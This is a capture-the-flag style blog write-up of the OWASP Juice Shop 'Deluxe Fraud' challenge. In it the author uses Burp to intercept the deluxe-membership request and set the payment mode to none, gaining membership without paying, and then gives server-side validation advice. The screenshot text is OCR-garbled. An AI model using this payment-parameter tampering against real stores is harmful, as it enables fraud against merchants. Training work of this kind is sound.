Pwning OWASP’s Juice Shop Pt. 24: Deluxe Fraud

Challenge: 

Name: Deluxe Fraud

Description: Obtain a Deluxe Membership without paying for it.

Difficulty: 3 star

Category: Improper Input Validation

Expanded Description: https://pwning.owasp-juice.shop/part2/improper-input-validation.html

Tools used:

Burp, FoxyProxy

Resources used:

None.

Methodology: 

In the expanded description for this challenge, it is heavily suggested that the payment parameters are the key to this particular challenge. While that obviously is how the score board would like for me to solve this, I wanted to see if paying with my ill-gotten gains from the Payback Time challenge would qualify as a solution.

My Payment Options 
O 
Add new card 
Pay using wallet 
Add a coupon 
Other payment options 
Back 
3456 
Alfred J. Goldman 
Add a credit or debit card 
Wallet Balance 
1000383.90 
Add a coupon code to receive discounts 
12/2094 
S pay 49.00Ä 
> Continue

It did not, and by registering for a deluxe membership in that manner I burned that particular account for this challenge. Oh well. It was a long shot anyway.

You are not eligible for deluxe membership! 
Deluxe Membership 
Enjoy amazing benefits as a a deluxe customer of OWASP Juice Shop. Check out what 
is included with your membership.

Next I decided to complete the challenge as directed, so (after creating a new user and paying that user back enough money to cover a deluxe membership) I fired up Burp Suite and FoxyProxy, then tried to pay with my wallet to see what data was being sent to the server.

Burp Project Intruder Repeater Window 
Dashboard Target 
Intruder 
Help Logger++ HIT P Request Smuggler 
Sequencer Decoder 
Repeater 
Comparer 
Extender 
HIT P history WebSockets 
Request to http://localhost:3000 
[12700 
Forward 
aw Params 
Drop 
Headers 
history Options 
Intercept ison 
"SON web Tokens 
Action 
Open Browser 
Pretty 
Raw 
ctions v 
POST / rest/ deluxe-membership HIT P/ 1.1 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, 
Accept 
Accept -Language: en-lJS, en; q=O.S 
Accept -Encoding: gzip, deflate 
rv.78.o) 
Gecko,'20100101 Firefox,'78.o 
Authorization: Bearer eyJOeXAiOiJKVIQiLCJhbGciOiJSUzIINiJ9. eyJzdGFOdXMiOiJzdRNj ZXNz 
Content -Type: application/ j son 
Content -Length: 24 
Origin: http• 
// I Ocal host 3000 
Connection: close 
Referer: http://localhost : 3000/ 
Cookle: language=en; welcomebanner status=dismiss; 
payment Mode" "wallet " 
cookleconsent 
status=dismiss, 
co

It can’t be that simple…

Pretty 
POST 
Host 
User- 
Raw 
Actions 
/ rest/ deluxe-membership HIT P/ 1.1 
local host 3000 
Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
rv.78.o) 
Gecko,'20100101 Firefox,'78.o 
application/ j son, text/ plain, l/ * 
Accept -Language: en-lJS, en; q=O.S 
Accept -Encoding: gzip, deflate 
Authorization: Bearer eyJOeXAiOiJKVIQiLCJhbGciOiJSUzIINiJ9. eyJzdGFOdXMiOiJzdRNj ZX 
Content -Type: application/ j son 
-Length: 24 
Origin: http• 
// I Ocal host 3000 
Connection: close 
Referer: http://localhost : 3000/ 
Cookle: language=en; welcomebanner status=dismiss; 
cookieconsent 
status=dismiss, 
payment Mode 
" none
You successfully solved a challenge: Deluxe Fraud (Obtain a Deluxe Membership without paying for it.) X

I guess it can.

Prevention and Mitigation Strategies:

Validate relevant information on the server side. The server should not issue a deluxe token or change the user’s role without verifying that payment had been received. That it didn’t even verify that a mode of payment had been selected is a major flaw, and one I would hope is extraordinarily infrequent in the real world.

Lessons Learned and Things Worth Mentioning: 

In other challenges it had become clear that all of the input validation was being done on the client side, with the server blindly accepting whatever I sent it. In this case it was a safe assumption that I could continue using that same trick, so I did.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s